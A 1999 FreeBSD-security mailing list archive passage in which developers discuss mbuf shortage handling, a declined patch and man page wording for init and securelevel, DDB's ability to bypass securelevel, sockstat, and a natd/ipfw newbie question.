Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :On Sun, 5 Sep 1999, Matthew Dillon wrote: : :> :> :> old value of ui_sbsize when uip is not NULL. That may make the :> :> problem more obvious. :> : :> :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 :> :delta = -0x2000. :> : :> : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ :> :> 0x1234 could be an indication of a reference to a data structure :> which has been freed. : :That would be 0xdeadc0de, but it wasn't actually 0x1234. It was something :else somewhat similar. After tracking down the problem k6_mem.c has, I may :look much more into this. : : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ I'm trying to remember where that came from.. .grep grep grep. Ah, here we are. 0x12342378 is used by the zone allocator to indicate a free entry. It stores it in a particular place (it isn't a fill). (see vm/vm_zone.h) -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 21:18:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id DA0A114E03; Sun, 5 Sep 1999 21:18:55 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id VAA70623; Sun, 5 Sep 1999 21:18:47 -0700 (PDT) (envelope-from dillon) Date: Sun, 5 Sep 1999 21:18:47 -0700 (PDT) From: Matthew Dillon Message-Id: <199909060418.VAA70623@apollo.backplane.com> To: Bosko Milekic Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : The only reason that I see for which we would actually panic() in :this situation (as opposed to suffer the packet loss) is if we get to the :point where we're losing packets because some script kid starts up :something that will eat up sockbuf space and continuously fork, then we :would lose all remote access to the machine in question (since all packets :would be dropped) and we wouldn't really mind a panic() for obvious :practical reasons. : In any case, I, personally, would prefer to suffer packet loss as :opposed to a panic (especially now that Brian is in the process of writing :diffs that will allow us to limit socket buffer space per UID through :login.conf!) : Having MGET store that null (e.g. fail as opposed to panic) on a :M_WAIT seems fairly easy to fix, and would probably require some patching :that would ensure that the packet loss is handeled relatively 'cleanly' :(probably some debugging), but I wouldn't mind doing this. However, I'd :like to know if there are objections to doing this or, in fact, if there :are any suggestions on how to handle mbuf shortage situations (aside from :just limiting -- although limiting is in itself a good solution and I'm :glad that Brian F. is working on that). : :Cheers, :Bosko. The issue is basically having someone find the time to figure out how to gracefully unwind various pieces of network code when an mbuf cannot be allocated. Once that is done, the panic can be turned into a (rate-limited) printf. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 21:55:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id 72BA115428; Sun, 5 Sep 1999 21:55:45 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp) Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id NAA28245; Mon, 6 Sep 1999 13:53:48 +0900 (JST) To: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Init(8) cannot decrease securelevel From: KATO Takenori X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990906135317J.kato@gneiss.eps.nagoya-u.ac.jp> Date: Mon, 06 Sep 1999 13:53:17 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 40 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Once securelevel has been increased, no process can decrease it because kernel always refuse decreasing it. This is inconsistent with the manual page of init: The kernel runs with four different levels of security. Any super-user process can raise the security level, but only init can lower it. Is there any security problem to implement this? If no, could someone review following patch? kato ---------- BEGIN ---------- *** kern_mib.c.ORIG Mon Sep 6 13:46:40 1999 --- kern_mib.c Mon Sep 6 13:49:44 1999 *************** *** 178,184 **** error = sysctl_handle_int(oidp, &level, 0, req); if (error || !req->newptr) return (error); ! if (level < securelevel) return (EPERM); securelevel = level; return (error); --- 178,184 ---- error = sysctl_handle_int(oidp, &level, 0, req); if (error || !req->newptr) return (error); ! if (level < securelevel && req->p->p_pid != 1) return (EPERM); securelevel = level; return (error); ---------- END ---------- -----------------------------------------------+--------------------------+ KATO Takenori | FreeBSD | Dept. Earth Planet. Sci, Nagoya Univ. | The power to serve! | Nagoya, 464-8602, Japan | http://www.FreeBSD.org/ | ++++ FreeBSD(98) 3.2: Rev. 01 available! |http://www.jp.FreeBSD.org/| ++++ FreeBSD(98) 2.2.8: Rev. 02 available! +==========================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 22:15: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 2AAE015443; Sun, 5 Sep 1999 22:15:02 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id PAA12402; Mon, 6 Sep 1999 15:13:48 +1000 Date: Mon, 6 Sep 1999 15:13:48 +1000 From: Bruce Evans Message-Id: <199909060513.PAA12402@godzilla.zeta.org.au> To: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, kato@ganko.eps.nagoya-u.ac.jp Subject: Re: Init(8) cannot decrease securelevel Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Once securelevel has been increased, no process can decrease it because >kernel always refuse decreasing it. This is inconsistent with the >manual page of init: > > The kernel runs with four different levels of security. Any super-user > process can raise the security level, but only init can lower it. > >Is there any security problem to implement this? If no, could someone >review following patch? The patch just backs out rev.1.9: RCS file: /home/ncvs/src/sys/kern/kern_mib.c,v Working file: kern_mib.c head: 1.25 ... ---------------------------- revision 1.9 date: 1997/06/25 07:31:47; author: joerg; state: Exp; lines: +2 -2 Don't ever allow lowering the securelevel at all. Allowing it does nothing good except of opening a can of (potential or real) security holes. People maintaining a machine with higher security requirements need to be on the console anyway, so there's no point in not forcing them to reboot before starting maintenance. Agreed by: hackers, guido ---------------------------- There used to be security holes that allowed root to lower `securelevel' using init. Rev.1.9 defends against any undiscovered holes. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 22:24:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id 7297A156C7; Sun, 5 Sep 1999 22:24:24 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp) Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id OAA28405; Mon, 6 Sep 1999 14:24:13 +0900 (JST) To: bde@zeta.org.au Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel From: KATO Takenori In-Reply-To: Your message of "Mon, 6 Sep 1999 15:13:48 +1000" <199909060513.PAA12402@godzilla.zeta.org.au> References: <199909060513.PAA12402@godzilla.zeta.org.au> X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> Date: Mon, 06 Sep 1999 14:23:42 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 36 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bruce Evans wrote: > There used to be security holes that allowed root to lower `securelevel' > using init. Rev.1.9 defends against any undiscovered holes. How about following change? ---------- *** init.8.ORIG Mon Sep 6 14:20:46 1999 --- init.8 Mon Sep 6 14:23:01 1999 *************** *** 92,99 **** .Dq secure . .Pp The kernel runs with four different levels of security. ! Any super-user process can raise the security level, but only ! .Nm can lower it. The security levels are: .Bl -tag -width flag --- 92,98 ---- .Dq secure . .Pp The kernel runs with four different levels of security. ! Any super-user process can raise the security level, but no process can lower it. The security levels are: .Bl -tag -width flag ---------- -----------------------------------------------+--------------------------+ KATO Takenori | FreeBSD | Dept. Earth Planet. Sci, Nagoya Univ. | The power to serve! | Nagoya, 464-8602, Japan | http://www.FreeBSD.org/ | ++++ FreeBSD(98) 3.2: Rev. 01 available! |http://www.jp.FreeBSD.org/| ++++ FreeBSD(98) 2.2.8: Rev. 02 available! +==========================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 22:27:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id F3CE3156C7; Sun, 5 Sep 1999 22:27:28 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id PAA13689; Mon, 6 Sep 1999 15:26:06 +1000 Date: Mon, 6 Sep 1999 15:26:06 +1000 From: Bruce Evans Message-Id: <199909060526.PAA13689@godzilla.zeta.org.au> To: bde@zeta.org.au, kato@ganko.eps.nagoya-u.ac.jp Subject: Re: Init(8) cannot decrease securelevel Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> There used to be security holes that allowed root to lower `securelevel' >> using init. Rev.1.9 defends against any undiscovered holes. > >How about following change? OK. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 2:15:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id CD9A114DE6; Mon, 6 Sep 1999 02:15:12 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA21387; Mon, 6 Sep 1999 11:13:49 +0200 (CEST) (envelope-from des) To: KATO Takenori Cc: bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> From: Dag-Erling Smorgrav Date: 06 Sep 1999 11:13:48 +0200 In-Reply-To: KATO Takenori's message of "Mon, 06 Sep 1999 14:23:42 +0900" Message-ID: Lines: 11 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org KATO Takenori writes: > The kernel runs with four different levels of security. > ! Any super-user process can raise the security level, but no process > can lower it. How about "The security level can only be raised by the super-user, and cannot be lowered by anyone." instead? DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 4:39:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 2E2D414EF0 for ; Mon, 6 Sep 1999 04:39:05 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.02 #1) id 11Nx6S-0007Hv-00; Mon, 06 Sep 1999 13:38:28 +0200 From: Sheldon Hearn To: sthaug@nethelp.no Cc: madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD In-reply-to: Your message of "Sat, 04 Sep 1999 13:41:45 +0200." <36622.936445305@verdi.nethelp.no> Date: Mon, 06 Sep 1999 13:38:28 +0200 Message-ID: <28018.936617908@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 04 Sep 1999 13:41:45 +0200, sthaug@nethelp.no wrote: > You're probably using ssh with X11 forwarding. If you use the > 'sockstat' program you'll find that sshd is listening to those ports. This is the third time I've seen someone try to use netstat to figure out who's listening to what. Do you think an xref to sockstat would be completely inappropriate in the netstat(1) manpage? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 4:49:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id D136914E39 for ; Mon, 6 Sep 1999 04:49:27 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 75798 invoked by uid 1001); 6 Sep 1999 11:47:33 +0000 (GMT) To: sheldonh@uunet.co.za Cc: madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 06 Sep 1999 13:38:28 +0200" References: <28018.936617908@axl.noc.iafrica.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 06 Sep 1999 13:47:33 +0200 Message-ID: <75796.936618453@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > This is the third time I've seen someone try to use netstat to figure > out who's listening to what. Do you think an xref to sockstat would be > completely inappropriate in the netstat(1) manpage? For those versions of FreeBSD where sockstat is installed by default (at least 3.2-STABLE and newer), I think a reference to sockstat would be an excellent idea. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 6:15:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 911EF159AD for ; Mon, 6 Sep 1999 06:15:05 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id PAA23584; Mon, 6 Sep 1999 15:14:41 +0200 (CEST) (envelope-from des) To: sthaug@nethelp.no Cc: sheldonh@uunet.co.za, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD References: <28018.936617908@axl.noc.iafrica.com> <75796.936618453@verdi.nethelp.no> From: Dag-Erling Smorgrav Date: 06 Sep 1999 15:14:40 +0200 In-Reply-To: sthaug@nethelp.no's message of "Mon, 06 Sep 1999 13:47:33 +0200" Message-ID: Lines: 15 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sthaug@nethelp.no writes: > > This is the third time I've seen someone try to use netstat to figure > > out who's listening to what. Do you think an xref to sockstat would be > > completely inappropriate in the netstat(1) manpage? > For those versions of FreeBSD where sockstat is installed by default > (at least 3.2-STABLE and newer), I think a reference to sockstat would > be an excellent idea. Look ma, I wrote something *useful*! *grin* DES (author of sockstat) -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 8:40:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 215B314DA9; Mon, 6 Sep 1999 08:40:23 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id IAA74893; Mon, 6 Sep 1999 08:39:54 -0700 (PDT) (envelope-from dillon) Date: Mon, 6 Sep 1999 08:39:54 -0700 (PDT) From: Matthew Dillon Message-Id: <199909061539.IAA74893@apollo.backplane.com> To: Dag-Erling Smorgrav Cc: KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :KATO Takenori writes: :> The kernel runs with four different levels of security. :> ! Any super-user process can raise the security level, but no process :> can lower it. : :How about "The security level can only be raised by the super-user, :and cannot be lowered by anyone." instead? : :DES :-- :Dag-Erling Smorgrav - des@flood.ping.uio.no Though, as a side note, it should be noted that if you have DDB enabled then lowering the secure level is pretty easy to do. If you have access to the console, of course. We used this trick at BEST a couple of times. Still, I think this might qualify as a bug in the securelevel implementation. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 12:14: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 55363153C7; Mon, 6 Sep 1999 12:13:35 -0700 (PDT) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id OAA20537; Mon, 6 Sep 1999 14:12:32 -0500 (CDT) Date: Mon, 6 Sep 1999 14:12:32 -0500 From: "Matthew D. Fuller" To: Matthew Dillon Cc: Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel Message-ID: <19990906141231.L18814@futuresouth.com> References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <199909061539.IAA74893@apollo.backplane.com>; from Matthew Dillon on Mon, Sep 06, 1999 at 08:39:54AM -0700 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 06, 1999 at 08:39:54AM -0700, a little birdie told me that Matthew Dillon remarked > > Though, as a side note, it should be noted that if you have DDB > enabled then lowering the secure level is pretty easy to do. If you > have access to the console, of course. We used this trick at BEST > a couple of times. Still, I think this might qualify as a bug in > the securelevel implementation. I don't know about 'bug in securelevel implementation'... For DDB to be DDB, you have to be able to tweak the running kernel any which way outside of its control. For securelevel to be securelevel, you have to prevent changes to X, Y, and Z, no matter how they're changed. I think it's more of a 'DDB is antithecal to securelevel'. Calling it a bug in securelevel is like calling lack of cargo space a bug in a Geo Metro. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ FutureSouth Communications | ISPHelp ISP Consulting "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 13:30: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 9419815009; Mon, 6 Sep 1999 13:29:48 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id NAA76229; Mon, 6 Sep 1999 13:29:44 -0700 (PDT) (envelope-from dillon) Date: Mon, 6 Sep 1999 13:29:44 -0700 (PDT) From: Matthew Dillon Message-Id: <199909062029.NAA76229@apollo.backplane.com> To: "Matthew D. Fuller" Cc: Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> <19990906141231.L18814@futuresouth.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :On Mon, Sep 06, 1999 at 08:39:54AM -0700, a little birdie told me :that Matthew Dillon remarked :> :> Though, as a side note, it should be noted that if you have DDB :> enabled then lowering the secure level is pretty easy to do. If you :> have access to the console, of course. We used this trick at BEST :> a couple of times. Still, I think this might qualify as a bug in :> the securelevel implementation. : :I don't know about 'bug in securelevel implementation'... :For DDB to be DDB, you have to be able to tweak the running kernel any :which way outside of its control. For securelevel to be securelevel, you :have to prevent changes to X, Y, and Z, no matter how they're changed. : :I think it's more of a 'DDB is antithecal to securelevel'. Calling it a :bug in securelevel is like calling lack of cargo space a bug in a Geo :Metro. : :Matthew Fuller (MF4839) | fullermd@over-yonder.net Well, if you are using DDB for kernel debugging via remote gdb, that is so. In the production installation at BEST we leave DDB turned on in order to be able to track panics and control dumps. We do not use it for remote gdb debugging. I think the vast majority of production installations which use DDB only need the trace, show, and panic capability. They probably do not need to issue writes into kernel memory. In these installations DDB is necessary to deal with system panics, so turning it off is not really an option. So making DDB 'secure-level friendly' would be a useful thing tgo do, I think. The idea is not to disable DDB, but to simply limit the actions that can be performed within it if the securelevel has been raised. The sysadmin would only be allowed to issue passive commands, cont, and 'panic'. The sysadmin would not be allowed to modify the running system. A hacker in a similar situation would not be able to do anything beyond crash the machine. I would rather a machine crash then give a hacker the ability to defeat the security mechanism in order to gain access to the system and modify data. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 13:58:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id AEEB315874 for ; Mon, 6 Sep 1999 13:58:31 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 8644 invoked from network); 7 Sep 1999 06:49:31 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 7 Sep 1999 06:49:31 +1000 Received: (qmail 14320 invoked by uid 1001); 7 Sep 1999 06:49:30 +1000 Message-ID: <19990906204930.14319.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Tue, 07 Sep 1999 06:49:29 +1000 From: Greg Black To: Matthew Dillon Cc: Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> In-reply-to: <199909061539.IAA74893@apollo.backplane.com> of Mon, 06 Sep 1999 08:39:54 MST Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon writes: > Though, as a side note, it should be noted that if you have DDB > enabled then lowering the secure level is pretty easy to do. If you > have access to the console, of course. It should also be noted that it makes no sense to enable DDB on systems that need to use elevated securelevels. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 18:26:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id 8322B14BCC; Mon, 6 Sep 1999 18:26:44 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp) Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id KAA02639; Tue, 7 Sep 1999 10:22:24 +0900 (JST) To: dillon@apollo.backplane.com Cc: des@flood.ping.uio.no, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel From: KATO Takenori In-Reply-To: Your message of "Mon, 6 Sep 1999 08:39:54 -0700 (PDT)" <199909061539.IAA74893@apollo.backplane.com> References: <199909061539.IAA74893@apollo.backplane.com> X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990907102153R.kato@gneiss.eps.nagoya-u.ac.jp> Date: Tue, 07 Sep 1999 10:21:53 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 21 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon wrote: > Though, as a side note, it should be noted that if you have DDB > enabled then lowering the secure level is pretty easy to do. If you > have access to the console, of course. We used this trick at BEST > a couple of times. Still, I think this might qualify as a bug in > the securelevel implementation. I also think it should be in manual page. But, I don't think it should be called `bug.' When an administrator maintains a machine with higher security, he/she must be careful with not only the securelevel also many other points, and may remove options for kernel hackers. -----------------------------------------------+--------------------------+ KATO Takenori | FreeBSD | Dept. Earth Planet. Sci, Nagoya Univ. | The power to serve! | Nagoya, 464-8602, Japan | http://www.FreeBSD.org/ | ++++ FreeBSD(98) 3.2: Rev. 01 available! |http://www.jp.FreeBSD.org/| ++++ FreeBSD(98) 2.2.8: Rev. 02 available! +==========================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 21: 9:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from valiant.cis.hcc.cc.il.us (valiant.cis.hcc.cc.il.us [4.17.214.6]) by hub.freebsd.org (Postfix) with ESMTP id 0995E15517 for ; Mon, 6 Sep 1999 21:09:17 -0700 (PDT) (envelope-from bryan@valiant.cis.hcc.cc.il.us) Received: from localhost (bryan@localhost) by valiant.cis.hcc.cc.il.us (8.9.3/8.9.3) with ESMTP id XAA10583; Mon, 6 Sep 1999 23:10:15 -0500 Date: Mon, 6 Sep 1999 23:10:15 -0500 (CDT) From: "Bryan Smith (Administrator)" To: "Dmitriy V. Bokiy" Cc: freebsd-security@FreeBSD.ORG Subject: Re: newbie: natd In-Reply-To: <1447.990905@cityline.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org deny everything that you do not have explicitly allowed in. if your kernel config is still set to default deny, then it's every address coming in reguardless of ipfw rules. if you want some addresses allowed in, enter those rules with ipfw before any rule denying incoming packets. Bryan Smith The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own rediness to receive him, not on the chance of his not attacking, but rather on the fact that we have made our position unassailable. -- Sun-Tzu The Art of Warfare On Sun, 5 Sep 1999, Dmitriy V. Bokiy wrote: > >From natd(8): > > "-deny_incoming | -d > Reject packets destined for the current IP number that have > no entry in the internal translation table." > > My question is what packets are affected by this option? Packets with public > addresses(I mean this scheme:Internet-->router(ipfw+NAT)-->subnet1(public addresses)-> > ->router(ipfw)-->subnet2(reserved addresses))? > > --Dmitriy > > P.S. Sorry, if it`s dull question. > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 21:21:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 370D71560B; Mon, 6 Sep 1999 21:21:40 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id VAA77483; Mon, 6 Sep 1999 21:20:55 -0700 (PDT) (envelope-from dillon) Date: Mon, 6 Sep 1999 21:20:55 -0700 (PDT) From: Matthew Dillon Message-Id: <199909070420.VAA77483@apollo.backplane.com> To: Greg Black Cc: Dag-Erling Smorgrav , KATO Takenori , 